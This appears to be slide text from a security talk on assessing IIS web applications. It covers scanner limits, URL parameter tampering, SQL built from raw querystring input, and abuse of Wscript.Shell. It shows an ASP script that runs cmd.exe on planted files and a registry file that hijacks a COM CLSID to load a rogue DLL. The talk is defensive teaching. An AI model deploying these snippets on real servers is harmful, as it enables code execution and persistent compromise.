Professional Documents
Culture Documents
Application Assessments On IIS
Application Assessments On IIS
Welcome!
David Litchfield
(d.litchfield@atstake.com)
Vulnerability Scanners
Cybercop
I. S. S.
Cerberus Internet Scanner
What scanners do do
They highlight known vulnerabilities in COTS products
Stocks-r-us.com
http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png
http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=
Exception Handling
SQL Queries
strSQL = select price from stocks where name =
_ & request.querystring(company) &
http://www.wiretrip.net/rfp
Contact Service
<%
..
SMTPObj = GetObject(
IIS:// & request.servervariables(SERVER_NAME) & /SMTPSVC)
..
%>
Wscript.Shell Object
WSObj = CreateObject(wscript.shell)
Read from the Registry
Write to the Regsitry
Execute commands
MSI.ASP
<%
Dim WshShell, strCMD, result
strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"
strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"
Set WshShell = Server.CreateObject("Wscript.Shell")
On Error Resume Next
result = WshShell.Run(strCMD)
result = WshShell.Run(strCMD2)
%>
MSI.REG
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000000000000046}\InProcServer32]
@="c:\\inetpub\\wwwroot\\foo.dll"
"ThreadingModel"="Both"
Summary
Understand the technology youre dealing with
Never trust user input anywhere
Ensure permissions are set properly
Dont trust third-party software until truly evaluated
Dont rely on client side checking
Scanners wont find these problems you will
Questions?